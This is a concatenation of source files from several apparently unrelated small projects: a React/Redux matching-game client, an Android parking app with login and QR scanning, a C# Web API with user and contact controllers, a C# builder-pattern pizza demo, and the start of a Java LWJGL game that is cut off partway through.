'webpack-hot-middleware/client?reload=true',
'webpack/hot/only-dev-server'
);
}
entry.push(
'babel-polyfill',
'./index'
);
return entry;
};
module.exports = env => (
{
context: path.join(__dirname, './src'),
debug: true,
devtool: env === 'development' ? 'eval-source-map' : 'source-map',
noInfo: true,
entry: getEntry(env),
output: {
path: path.join(__dirname, './dist'),
publicPath: '/',
filename: 'scripts.js',
},
plugins: getPlugins(env),
module: {
loaders: getLoaders(env),
},
postcss: [autoprefixer({ browsers: ['last 2 versions'] })],
resolve: {
extensions: ['', '.js'],
},
}
);
<file_sep>import { ActionTypes } from '../actions';
// Reducers
const initialState = 0;
const currentIndex = (state = initialState, action) => {
switch (action.type) {
case ActionTypes.START_GAME:
case ActionTypes.STOP_GAME:
return initialState;
case ActionTypes.UPDATE_STREAM_VALUE:
case ActionTypes.UPDATE_SCORE_UP:
case ActionTypes.UPDATE_SCORE_DOWN:
case ActionTypes.GO_TO_HISTORY_NEXT:
return state + 1;
case ActionTypes.GO_TO_HISTORY_PREV:
return state - 1;
default:
return state;
}
};
export default currentIndex;
// Selectors
export const getCurrentIndex = state => state;
<file_sep>import React, { PropTypes } from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router';
import { getHasPlayed } from '../reducers';
import * as actions from '../actions';
const PlayControls = ({ hasPlayed, checkMatch }) => (
<div className="controls">
<button
className="button button--primary"
type="button"
onClick={checkMatch}
disabled={hasPlayed}
>
I see a match
</button>
<Link
className="button button--secondary"
to="/replay"
>
End game
</Link>
</div>
);
PlayControls.propTypes = {
hasPlayed: PropTypes.bool.isRequired,
checkMatch: PropTypes.func.isRequired,
};
const mapStateToProps = state => ({
hasPlayed: getHasPlayed(state),
});
export default connect(
mapStateToProps,
actions
)(PlayControls);
<file_sep>const webpack = require('webpack');
const webpackConfig = require('../webpack.config')('production');
require('colors');
process.env.NODE_ENV = 'production';
webpack(webpackConfig).run((err, stats) => {
console.log('Generating minified bundle for production.'.bold.blue);
if (err) {
    console.log(err.toString().bold.red);
return 1;
}
const jsonStats = stats.toJson();
  if (jsonStats.errors.length) return jsonStats.errors.map(error => console.log(error.red));
  if (jsonStats.warnings.length) {
console.log('Webpack warnings: '.bold.yellow);
jsonStats.warnings.map(warning => console.log(warning.yellow));
}
console.log('Done. Site ready in dist folder.'.green.bold);
return 0;
});
<file_sep>import React, { PropTypes } from 'react';
import { Link } from 'react-router';
const NotFound = () => (
<div className="error">
<div className="error__text">
<h1>Not found.</h1>
<p>The URL doesn't exist.</p>
</div>
<Link
className="button button--secondary"
to="/"
>
Go home
</Link>
</div>
);
export default NotFound;
<file_sep>import React, { PropTypes } from 'react';
import { connect } from 'react-redux';
import { getStreams } from '../reducers';
import GameboardStreamsItem from './GameboardStreamsItem';
const GameboardStreams = ({ items }) => (
<div className="gameboard__streams">
{items.map((item, index) =>
<GameboardStreamsItem
key={index}
{...item}
/>
)}
</div>
);
GameboardStreams.propTypes = {
items: PropTypes.arrayOf(PropTypes.shape({
id: PropTypes.number,
number: PropTypes.number,
color: PropTypes.string,
})).isRequired,
};
const mapStateToProps = state => ({
items: getStreams(state),
});
export default connect(
mapStateToProps
)(GameboardStreams);
<file_sep>const browserSync = require('browser-sync');
const webpack = require('webpack');
const webpackDevMiddleware = require('webpack-dev-middleware');
const webpackHotMiddleware = require('webpack-hot-middleware');
const historyApiFallback = require('connect-history-api-fallback');
const webpackConfig = require('../webpack.config')('development');
const bundler = webpack(webpackConfig);
browserSync({
server: {
baseDir: 'src',
middleware: [
historyApiFallback(),
webpackDevMiddleware(bundler, {
publicPath: webpackConfig.output.publicPath,
stats: {
colors: true,
hash: false, version: false, timings: false,
assets: false, chunks: false, children: false,
},
}),
webpackHotMiddleware(bundler),
],
},
files: [
'src/*.html',
],
notify: false,
ghostMode: false,
});
<file_sep>import React, { PropTypes } from 'react';
import GameboardStreamsItemProperty from './GameboardStreamsItemProperty';
const GameboardStreamsItem = ({ number, color }) => (
<ul className="gameboard__streams__item">
<GameboardStreamsItemProperty
type="number"
value={number}
/>
<GameboardStreamsItemProperty
type="color"
value={color}
/>
</ul>
);
GameboardStreamsItem.propTypes = {
number: PropTypes.number,
color: PropTypes.string,
};
export default GameboardStreamsItem;
<file_sep># Matchdux client
**Important**: Start the accompanying server `matchdux-server` before running this app.
## Install
You'll need to install [Node.js](http://nodejs.org) first if you don't have it. Then run the following command to install all project dependencies:
npm install
For development, installing the [Redux DevTools extension](https://github.com/zalmoxisus/redux-devtools-extension) in the browser is optional but highly recommended. The project is already set up to work with it.
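
For reference, the usual wiring for the extension looks like the sketch below (illustrative only — the actual store setup in `src` may differ):

    import { createStore } from 'redux';
    import rootReducer from './reducers';

    // pass the extension's enhancer only when it is available in the browser
    const store = createStore(
      rootReducer,
      window.__REDUX_DEVTOOLS_EXTENSION__ && window.__REDUX_DEVTOOLS_EXTENSION__()
    );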
## Run
To start the site in **development** mode (with file watching and hot reloading enabled):
npm start
To start the site in **production** mode:
npm run build:serve
The project uses [Browsersync](https://www.browsersync.io/), which allows opening the site on any device connected to the same local network, syncing action between devices, etc. Check its website for details.
## Build
Run the following command to get a production-ready build of the site in the `dist` folder (with minified files, inlined or optimized images, etc):
npm run build
<file_sep>import React from 'react';
import { Route, IndexRoute } from 'react-router';
import App from './components/App';
import Welcome from './components/Welcome';
import Play from './components/Play';
import Replay from './components/Replay';
import NotFound from './components/NotFound';
const routes = (
<Route path="/" component={App}>
<IndexRoute component={Welcome} />
<Route path="play" component={Play} />
<Route path="replay" component={Replay} />
<Route path="*" component={NotFound} />
</Route>
);
export default routes;
<file_sep>import { ActionTypes } from '../actions';
import streams, * as fromStreams from './streams';
import score, * as fromScore from './score';
// Reducers
const initialState = {};
const item = (state = initialState, action) => {
switch (action.type) {
case ActionTypes.START_GAME:
case ActionTypes.UPDATE_STREAM_VALUE:
case ActionTypes.UPDATE_SCORE_UP:
case ActionTypes.UPDATE_SCORE_DOWN:
return {
...state,
streams: streams(state.streams, action),
score: score(state.score, action),
};
default:
return state;
}
};
const items = (state = [], action) => {
switch (action.type) {
case ActionTypes.START_GAME:
return [
item(undefined, action),
];
case ActionTypes.UPDATE_STREAM_VALUE:
case ActionTypes.UPDATE_SCORE_UP:
case ActionTypes.UPDATE_SCORE_DOWN:
return [
...state,
item(state[state.length - 1], action),
];
default:
return state;
}
};
export default items;
// Selectors
const getItem = (state, index) => state[index] || initialState;
export const getStreams = (state, index) => fromStreams.getStreams(getItem(state, index).streams);
export const getScore = (state, index) => fromScore.getScore(getItem(state, index).score);
export const getItemsLength = state => state.length;
<file_sep>import React, { Component, PropTypes } from 'react';
import { connect } from 'react-redux';
import * as actions from '../actions';
import Gameboard from './Gameboard';
import PlayControls from './PlayControls';
class Play extends Component {
componentDidMount() {
this.props.startGame();
}
componentWillUnmount() {
this.props.endGame();
}
render() {
return (
<div>
<Gameboard />
<PlayControls />
</div>
);
}
}
Play.propTypes = {
startGame: PropTypes.func.isRequired,
endGame: PropTypes.func.isRequired,
};
export default connect(
null,
actions
)(Play);
<file_sep>import React, { PropTypes } from 'react';
import { connect } from 'react-redux';
import { getScore } from '../reducers';
const GameboardScore = ({ value }) => (
<div className="gameboard__score">
<div className="gameboard__score__text">
{value}
</div>
</div>
);
GameboardScore.propTypes = {
value: PropTypes.number.isRequired,
};
const mapStateToProps = state => ({
value: getScore(state),
});
export default connect(
mapStateToProps
)(GameboardScore);
<file_sep>import { ActionTypes } from '../actions';
const POINTS_UNIT = 1;
// Reducers
const initialState = 0;
const score = (state = initialState, action) => {
switch (action.type) {
case ActionTypes.UPDATE_SCORE_UP:
return state + POINTS_UNIT;
case ActionTypes.UPDATE_SCORE_DOWN:
return state - POINTS_UNIT;
default:
return state;
}
};
export default score;
// Selectors
export const getScore = state => state || initialState;
<file_sep>const browserSync = require('browser-sync');
browserSync({
server: {
baseDir: 'dist',
},
notify: false,
ghostMode: false,
});
<file_sep>import { combineReducers } from 'redux';
import history, * as fromHistory from './history';
import hasPlayed, * as fromHasPlayed from './hasPlayed';
const rootReducer = combineReducers({
history,
hasPlayed,
});
export default rootReducer;
export const getStreams = state => fromHistory.getStreams(state.history);
export const getScore = state => fromHistory.getScore(state.history);
export const getIsFirstItem = state => fromHistory.getIsFirstItem(state.history);
export const getIsLastItem = state => fromHistory.getIsLastItem(state.history);
export const getHasPlayed = state => fromHasPlayed.getHasPlayed(state.hasPlayed);
|
9f2433b9703fe6a3895c8f6e1f59c1e77f2ea5bc
|
[
"JavaScript",
"Markdown"
] | 17
|
JavaScript
|
soyguijarro/matchdux-client
|
529075d3e22b8707100b62b768f07c9bfb67d878
|
5791c84a8e2af8e452c1d2d8c1276f8126f68918
|
refs/heads/master
|
<file_sep>package com.eekrain.amikomparking;
import android.content.Context;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ImageView;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.recyclerview.widget.RecyclerView;
import java.util.ArrayList;
public class HistoryAdapter extends RecyclerView.Adapter<HistoryAdapter.MyViewHolder> {
ArrayList<String> plat, date;
ArrayList<Boolean> status;
int[] status_images;
Context context;
public HistoryAdapter(Context ct, ArrayList<String> input_plat, ArrayList<String> input_date, ArrayList<Boolean> input_status, int[] input_img) {
context = ct;
plat = input_plat;
date = input_date;
status = input_status;
status_images = input_img;
}
@NonNull
@Override
public MyViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
LayoutInflater inflater = LayoutInflater.from(context);
View view = inflater.inflate(R.layout.history_row, parent, false);
return new MyViewHolder(view);
}
@Override
public void onBindViewHolder(@NonNull MyViewHolder holder, int position) {
holder.txtPlat.setText(plat.get(position));
holder.txtTime.setText(date.get(position));
Boolean status_ref = status.get(position);
if (status_ref) {
holder.imgStatus.setImageResource(status_images[0]);
} else {
holder.imgStatus.setImageResource(status_images[1]);
}
}
@Override
public int getItemCount() {
return date.size();
}
public class MyViewHolder extends RecyclerView.ViewHolder {
TextView txtPlat, txtTime;
ImageView imgStatus;
public MyViewHolder(@NonNull View itemView) {
super(itemView);
txtPlat = itemView.findViewById(R.id.plat_history);
txtTime = itemView.findViewById(R.id.time_history);
imgStatus = itemView.findViewById(R.id.status_history);
}
}
}
<file_sep>package com.eekrain.amikomparking;
import android.Manifest;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.widget.TextView;
import android.widget.Toast;
import androidx.appcompat.app.AppCompatActivity;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONObjectRequestListener;
import com.google.zxing.Result;
import com.karumi.dexter.Dexter;
import com.karumi.dexter.PermissionToken;
import com.karumi.dexter.listener.PermissionDeniedResponse;
import com.karumi.dexter.listener.PermissionGrantedResponse;
import com.karumi.dexter.listener.PermissionRequest;
import com.karumi.dexter.listener.single.PermissionListener;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.HashMap;
import me.dm7.barcodescanner.zxing.ZXingScannerView;
public class QRScanActitivy extends AppCompatActivity implements ZXingScannerView.ResultHandler {
public static final String URL_SCAN = "https://amikom.rocketjaket.com/api/Parking/processParking";
Context context;
String plat, nim;
SessionManager sessionManager;
private ZXingScannerView scannerView;
private TextView txt_Result;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_qrscan);
sessionManager = new SessionManager(this);
sessionManager.checkLogin();
HashMap<String, String> user = sessionManager.getUserDetail();
nim = user.get(SessionManager.NIM);
//init
scannerView = findViewById(R.id.zxscan);
txt_Result = findViewById(R.id.txt_Result);
context = this;
getIntentExtraData();
//req permission
Dexter.withActivity(this)
.withPermission(Manifest.permission.CAMERA)
.withListener(new PermissionListener() {
@Override
public void onPermissionGranted(PermissionGrantedResponse response) {
scannerView.setResultHandler(QRScanActitivy.this);
scannerView.startCamera();
}
@Override
public void onPermissionDenied(PermissionDeniedResponse response) {
Toast.makeText(QRScanActitivy.this, "Anda harus memberi izin penggunaan kamera!", Toast.LENGTH_SHORT).show();
}
@Override
public void onPermissionRationaleShouldBeShown(PermissionRequest permission, PermissionToken token) {
}
})
.check();
}
@Override
protected void onDestroy() {
scannerView.stopCamera();
super.onDestroy();
}
private void getIntentExtraData() {
if (getIntent().hasExtra("plat")) {
plat = getIntent().getStringExtra("plat");
// Toast.makeText(context, "Plat : " + plat , Toast.LENGTH_SHORT).show();
} else {
Toast.makeText(context, "No data", Toast.LENGTH_SHORT).show();
}
}
@Override
public void handleResult(Result rawResult) {
txt_Result.setText(rawResult.getText());
AndroidNetworking.post(URL_SCAN)
.addBodyParameter("nim", nim)
.addBodyParameter("plat", plat)
.addBodyParameter("qrcode", rawResult.getText())
.setTag(context)
.setPriority(Priority.HIGH)
.build()
.getAsJSONObject(new JSONObjectRequestListener() {
@Override
public void onResponse(JSONObject response) {
try {
Boolean status = response.getBoolean("status");
String message = response.getString("message");
if (status) {
String mhs_foto = response.getString("mhs_foto");
String mhs_nama = response.getString("mhs_nama");
String plat = response.getString("plat");
String jenis = response.getString("jenis");
String merk = response.getString("merk");
String tipe = response.getString("tipe");
Toast.makeText(context, message, Toast.LENGTH_SHORT).show();
Intent sukses = new Intent(context, ConfirmActivity.class);
sukses.putExtra("mhs_foto", mhs_foto);
sukses.putExtra("mhs_nama", mhs_nama);
sukses.putExtra("plat", plat);
sukses.putExtra("jenis", jenis);
sukses.putExtra("merk", merk);
sukses.putExtra("tipe", tipe);
context.startActivity(sukses);
finish();
} else {
Toast.makeText(context, message, Toast.LENGTH_SHORT).show();
Intent gagal = new Intent(context, HomeActivity.class);
context.startActivity(gagal);
finish();
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
<file_sep>package com.eekrain.amikomparking;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.Button;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONArrayRequestListener;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.ArrayList;
import java.util.HashMap;
public class HomeActivity extends AppCompatActivity {
public static String URL_GETVEHICLE = "https://amikom.rocketjaket.com/api/vehicle/getListVehicleJSON";
public static String TAG = "HomeActivity";
public ArrayList<String> plat = new ArrayList<String>();
public ArrayList<String> jenis = new ArrayList<String>();
SessionManager sessionManager;
RecyclerView recycler_vehicle;
String nim, nama;
Context context;
Button logoutbtn;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_home);
sessionManager = new SessionManager(this);
sessionManager.checkLogin();
logoutbtn = findViewById(R.id.logoutbtn);
recycler_vehicle = findViewById(R.id.list_vehicle);
HashMap<String, String> user = sessionManager.getUserDetail();
nim = user.get(SessionManager.NIM);
nama = user.get(SessionManager.NAME);
// Toast.makeText(context, "nama : " + nama, Toast.LENGTH_SHORT).show();
logoutbtn.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Intent tete = new Intent(HomeActivity.this, SplashActivity1.class);
startActivity(tete);
sessionManager.logout();
finish();
}
});
context = this;
AndroidNetworking.initialize(getApplicationContext());
AndroidNetworking.post(URL_GETVEHICLE)
.addBodyParameter("nim", nim)
.setTag(this)
.setPriority(Priority.HIGH)
.build()
.getAsJSONArray(new JSONArrayRequestListener() {
@Override
public void onResponse(JSONArray response) {
try {
                            for (int i = 0; i < response.length(); i++) {
                                JSONObject jsonObject = response.getJSONObject(i);
                                plat.add(jsonObject.getString("plat"));
                                jenis.add(jsonObject.getString("jenis"));
                            }
                            Log.v(TAG, "vehicles loaded: " + plat.size());
                            // build the adapter once after all rows are parsed, not on every loop iteration
                            VehicleAdapter vehicleAdapter = new VehicleAdapter(context, plat, jenis);
                            recycler_vehicle.setAdapter(vehicleAdapter);
                            recycler_vehicle.setLayoutManager(new LinearLayoutManager(context));
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
<file_sep>package com.eekrain.amikomparking;
import android.content.Context;
import android.os.Bundle;
import android.util.Log;
import android.widget.Toast;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONArrayRequestListener;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.ArrayList;
import java.util.HashMap;
public class HistoryActivityBkp extends AppCompatActivity {
public static final String URL_HISTORY = "https://amikom.rocketjaket.com/api/History/getDataListHistory";
RecyclerView recyclerView;
String nim;
Context context;
ArrayList<String> plat = new ArrayList<String>();
ArrayList<String> date = new ArrayList<String>();
ArrayList<Boolean> status = new ArrayList<Boolean>();
int[] status_images = {R.drawable.ic_check, R.drawable.ic_close};
    SessionManager sessionManager;
    HistoryAdapter historyAdapter;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_history_bkp);
        AndroidNetworking.initialize(getApplicationContext());
        recyclerView = findViewById(R.id.recyclerHistory);
        context = this;
        sessionManager = new SessionManager(context);
        HashMap<String, String> user = sessionManager.getUserDetail();
        nim = user.get(SessionManager.NIM);
        historyAdapter = new HistoryAdapter(this, plat, date, status, status_images);
        recyclerView.setAdapter(historyAdapter);
        recyclerView.setLayoutManager(new LinearLayoutManager(this));
        // read nim from the session before requesting the history for that user
        getHistoryData(nim);
}
public void getHistoryData(String nim_ref) {
AndroidNetworking.post(URL_HISTORY)
.addBodyParameter("nim", nim_ref)
.setTag(this)
.setPriority(Priority.HIGH)
.build()
.getAsJSONArray(new JSONArrayRequestListener() {
@Override
public void onResponse(JSONArray response) {
try {
for (int i = 0; i < response.length(); i++) {
JSONObject jsonObject = response.getJSONObject(i);
String plat_res = jsonObject.getString("plat");
String date_res = jsonObject.getString("date");
Boolean status_res = jsonObject.getBoolean("status");
Log.v("HistoryActivityBkp", "ASUUUUUSUUUUUUUUUUUUUUUUUU : " + plat_res);
Toast.makeText(context, "plat : " + plat_res, Toast.LENGTH_SHORT).show();
plat.add(plat_res);
date.add(date_res);
status.add(status_res);
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
<file_sep>include ':app'
rootProject.name='AmikomParking'
<file_sep>package com.eekrain.amikomparking;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;
import androidx.appcompat.app.AppCompatActivity;
import com.androidnetworking.AndroidNetworking;
import com.androidnetworking.common.Priority;
import com.androidnetworking.error.ANError;
import com.androidnetworking.interfaces.JSONObjectRequestListener;
import org.json.JSONException;
import org.json.JSONObject;
public class LoginActivity extends AppCompatActivity {
public static String URL_LOGIN = "https://amikom.rocketjaket.com/api/auth";
EditText nim, password;
Button btn_login;
SessionManager sessionManager;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_login);
sessionManager = new SessionManager(this);
nim = findViewById(R.id.nim);
password = findViewById(R.id.password);
btn_login = findViewById(R.id.btn_login);
btn_login.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
Login();
}
});
AndroidNetworking.initialize(getApplicationContext());
}
private void Login() {
AndroidNetworking.post(URL_LOGIN)
.addBodyParameter("nim", nim.getText().toString())
.addBodyParameter("pass", password.getText().toString())
.setTag(this)
.setPriority(Priority.HIGH)
.build()
.getAsJSONObject(new JSONObjectRequestListener() {
@Override
public void onResponse(JSONObject response) {
try {
Boolean status = response.getBoolean("status");
String message = response.getString("message");
if (status) {
String nama_mhs = response.getString("nama");
Toast.makeText(LoginActivity.this, message, Toast.LENGTH_SHORT).show();
sessionManager.createSession(nim.getText().toString(), nama_mhs);
Intent intent = new Intent(LoginActivity.this, HomeActivity.class);
startActivity(intent);
finish();
} else {
Toast.makeText(LoginActivity.this, "Invalid NIM/Password", Toast.LENGTH_SHORT).show();
}
} catch (JSONException e) {
e.printStackTrace();
}
}
@Override
public void onError(ANError anError) {
}
});
}
}
|
8e40ed5d2e909b0d740d662b1ff6106342161e05
|
[
"Java",
"Gradle"
] | 6
|
Java
|
irfan1775/AmikomParking12
|
749fc724301eb4c017695eb2c1ef33d645522b26
|
17a6cc73d682a7c7555add65f275017c41f52502
|
refs/heads/main
|
<repo_name>MehboobSingh/Nabonett<file_sep>/NabonettWebAPI/Controllers/UserController.cs
using System.Collections.Generic;
using System.Threading.Tasks;
using Core;
using Core.Entities;
using Microsoft.AspNetCore.Mvc;
namespace NabonettWebAPI.Controllers
{
[Route("Users")]
public class UserController: Controller
{
private readonly IUserService userService;
public UserController(IUserService userService)
{
this.userService = userService;
}
[HttpGet]
public async Task<IReadOnlyCollection<User>> GetAllAsync()
{
var result = await userService.GetAllAsync();
return result;
}
[HttpGet("/user/{id}")]
        public async Task<User> GetByIDAsync(string ID)
{
var result = await userService.GetByIDAsync(ID);
return result;
}
[HttpGet("/user/{id}/Email")]
public List<Email> GetEmailsByIDAsync(string ID)
{
return new List<Email>();
}
}
}<file_sep>/NabonettWebAPI/Startup.cs
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.Hosting;
using Core;
using Core.DataInterfaces;
using Data;
using Data.Users;
using Microsoft.EntityFrameworkCore;
using Microsoft.Extensions.DependencyInjection;
using Data.Contacts;
namespace NabonettWebAPI
{
public class Startup
{
public Startup(IConfiguration configuration)
{
Configuration = configuration;
}
public IConfiguration Configuration { get; }
// This method gets called by the runtime. Use this method to add services to the container.
public void ConfigureServices(IServiceCollection services)
{
ConfigureDatabaseProvider(services);
services.AddControllers();
services.AddHttpContextAccessor();
services.AddSwaggerGen();
services.AddTransient<IUserService, UserService>();
services.AddTransient<IContactService, ContactService>();
services.AddTransient<IUserRepository, UsersRepository>();
services.AddTransient<IContactRepository, ContactRepository>();
}
protected virtual void ConfigureDatabaseProvider(IServiceCollection services)
{
services.AddDbContext<NabonettContext>(options =>
{
options.UseSqlServer(Configuration["ConnectionStrings:NabonettDB"]);
});
}
// This method gets called by the runtime. Use this method to configure the HTTP request pipeline.
public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment())
{
app.UseDeveloperExceptionPage();
}
app.UseHttpsRedirection();
app.UseRouting();
app.UseAuthorization();
app.UseEndpoints(endpoints =>
{ endpoints.MapControllers(); });
}
}
}<file_sep>/NabonettWebAPI/Controllers/HousingController.cs
using System;
using Microsoft.AspNetCore.Mvc;
namespace NabonettWebAPI.Controllers
{
public class HousingController: Controller
{
public HousingController()
{
}
}
}
<file_sep>/NabonettWebAPI/Controllers/ContactController.cs
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using Core;
using Core.Entities;
using Microsoft.AspNetCore.Mvc;
namespace NabonettWebAPI.Controllers
{
[Route ("Contacts")]
public class ContactController : Controller
{
private readonly IContactService contactService;
public ContactController(IContactService contactService)
{
this.contactService = contactService;
}
[HttpGet]
public async Task<IReadOnlyCollection<Contact>> GetAllAsync()
{
var contact = await contactService.GetAllAsync();
return contact;
}
[HttpGet("/id/{id}")]
public async Task<Contact> GetAsync(string id)
{
var conto = await contactService.GetContactAsync(id);
return conto;
}
[HttpGet("/email/{email}")]
public async Task<Contact> GetByEmailAsync(string email)
{
var conto = await contactService.GetByEmailAsync(email);
return conto;
}
        // [HttpPost]
        // public async Task<Contact> Update()
        // {
        //     // var update = await contactService.GetAllAsync();
        // }
    }
}
|
1810d87c613b5447c54a4cd46ab64f8af9243adf
|
[
"C#"
] | 4
|
C#
|
MehboobSingh/Nabonett
|
f5a5970fa085b8358234bb3a6e2381d9a3cebb33
|
16e9dd3a269c8f1c23d35accbc1d18f9bc4141d9
|
refs/heads/main
|
<repo_name>TaifBinEid/Builder<file_sep>/PizzaDesignPattren/PizzaDesignPattren/Program.cs
using System;
using System.Collections.Generic;
namespace PizzaDesignPattren
{
public interface IPizzaBuilder
{
// This is the basis for building any pizza
public void BuildDough();
public void BuildSauce();
public void BuildTopping();
public void Reset(); // to reset after make pizza
}
public class ThinPizzeBuilder : IPizzaBuilder
{
private ThinPizza _thin = new ThinPizza();
public ThinPizzeBuilder()
{
this.Reset();
}
public void Reset()
{
this._thin = new ThinPizza();
}
public void BuildDough()
{
this._thin.PreparePizza("Preparing the dough ..white");
}
public void BuildSauce()
{
this._thin.PreparePizza("Add souce ..white souce");
}
public void BuildTopping()
{
this._thin.PreparePizza("Add favorite topping .. cheese");
}
public ThinPizza GetPizza()
{
ThinPizza final = this._thin;
this.Reset();
return final;
}
}
public class ThickPizzaBuilder : IPizzaBuilder
{
private ThickPizza _thick = new ThickPizza();
public ThickPizzaBuilder()
{
this.Reset();
}
public void Reset()
{
this._thick = new ThickPizza();
}
public void BuildDough()
{
this._thick.PreparePizza("Preparing the dough ..wheat");
}
public void BuildSauce()
{
this._thick.PreparePizza("Add souce ..without");
}
public void BuildTopping()
{
this._thick.PreparePizza("Add favorite topping ..vegetables + cheese");
}
public ThickPizza GetPizza()
{
ThickPizza final = this._thick;
this.Reset();
return final;
}
}
public class ThinPizza
{
private List<object> _pizza = new List<object>();
public void PreparePizza(string pizza)
        { // determine type of dough, sauce, topping
this._pizza.Add(pizza);
}
public string PizzaOrder()
{
string str = "";
for (int i = 0; i < this._pizza.Count; i++)
{
str += this._pizza[i] + "\n";
}
return "Thin Pizza order : \n" + str;
}
}
public class ThickPizza
{
private List<string> _pizza = new List<string>();
public void PreparePizza(string pizza)
        { // determine type of dough, sauce, topping
this._pizza.Add(pizza);
}
public string PizzaOrder()
{
string str = "";
for (int i = 0; i < this._pizza.Count; i++)
{
str += this._pizza[i] + "\n";
}
return "Thick Pizza order : \n" + str;
}
}
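    // The Director encapsulates the order of the build steps, so the same
    // sequence can produce different pizzas depending on the builder supplied.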
public class Director
{
private IPizzaBuilder _pizzaBuilder;
public IPizzaBuilder PizzaBuilder
{
set { this._pizzaBuilder = value; }
}
public void makePizza()
{
this._pizzaBuilder.BuildDough();
this._pizzaBuilder.BuildSauce();
this._pizzaBuilder.BuildTopping();
}
public void makePizzaWithoutSauce()
{
this._pizzaBuilder.BuildDough();
this._pizzaBuilder.BuildTopping();
}
}
class Program
{
static void Main(string[] args)
{
Director director = new Director();
ThickPizzaBuilder thick = new ThickPizzaBuilder();
ThinPizzeBuilder thin = new ThinPizzeBuilder();
ThinPizzeBuilder thin2 = new ThinPizzeBuilder();
director.PizzaBuilder = thin;
            // the director assembles a thin pizza order (white dough, white sauce, cheese topping)
director.makePizza();
Console.WriteLine(thin.GetPizza().PizzaOrder());
director.PizzaBuilder = thick;
            // the director assembles a thick pizza order (wheat dough, no sauce, vegetables + cheese)
director.makePizza();
Console.WriteLine(thick.GetPizza().PizzaOrder());
director.PizzaBuilder = thin2;
//director make another order without souce
director.makePizzaWithoutSauce();
Console.WriteLine(thin2.GetPizza().PizzaOrder());
            // Bonus 1: make a pizza order without the director
ThinPizzeBuilder pizza = new ThinPizzeBuilder();
pizza.BuildDough();
pizza.BuildSauce();
pizza.BuildTopping();
Console.WriteLine(pizza.GetPizza().PizzaOrder());
            /* Bonus 2: let the user enter their own order!
* public interface IPizzaBuilder
{
// This is the basis for building any pizza
public void BuildDough(string d);
public void BuildSauce(string s);
public void BuildTopping(string t);
}
Console.WriteLine("What is the favorite type of dough (thin / thick)?");
string choice = Console.ReadLine();
string dough;
string souce;
string topping;
switch (choice)
{
case "thin":
director.PizzaBuilder = thin;
Console.WriteLine("Enter your favorite dough :(white / wheat)? ");
dough = Console.ReadLine();
Console.WriteLine("Enter your favorite souce : ");
souce = Console.ReadLine();
Console.WriteLine("Enter you favorite topping?");
topping = Console.ReadLine();
thin.makepizza(dough,souce,topping);
Console.WriteLine(thin.GetPizza().PizzaOrder());
Console.WriteLine("Enjoy .. :)");
break;
case "thick":
director.PizzaBuilder = thick;
Console.WriteLine("Enter your favorite dough :(white / wheat)? ");
dough = Console.ReadLine();
Console.WriteLine("Enter your favorite souce : ");
souce = Console.ReadLine();
Console.WriteLine("Enter you favorite topping?");
topping = Console.ReadLine();
director.makePizza(dough,souce,topping);
Console.WriteLine(thick.GetPizza().PizzaOrder());
Console.WriteLine("Enjoy .. :)");
break;
default:
Console.WriteLine("invalid choice");
break;
}*/
}
}
}
|
045284a1b2152da7517980ea0db0c70051e4615e
|
[
"C#"
] | 1
|
C#
|
TaifBinEid/Builder
|
4b839f24f1fbb76d8563d29f38b85d954d11c8a9
|
c902d143af39608c607931ef70a7696ffb0d9cc4
|
refs/heads/master
|
<file_sep>package by.ansgar.catcher2d.main;
public class Main {
public static void main(String args[]){
new GamePanel();
}
}
<file_sep>package by.ansgar.catcher2d.util;
import org.lwjgl.input.Keyboard;
import org.lwjgl.opengl.Display;
import by.ansgar.catcher2d.entity.Enemy;
import by.ansgar.catcher2d.entity.MainHero;
import by.ansgar.catcher2d.main.GamePanel;
public class Input {
public void input() {
if (Keyboard.isKeyDown(Keyboard.KEY_ESCAPE)) {
System.out.println("Goodbye");
Display.destroy();
System.exit(0);
}
if(Keyboard.isKeyDown(Keyboard.KEY_R)){
GamePanel.enemys.add(new Enemy());
}
}
public void moveHero() {
if (Keyboard.isKeyDown(Keyboard.KEY_A)) {
((MainHero) GamePanel.hero).update(-1, 0);
}
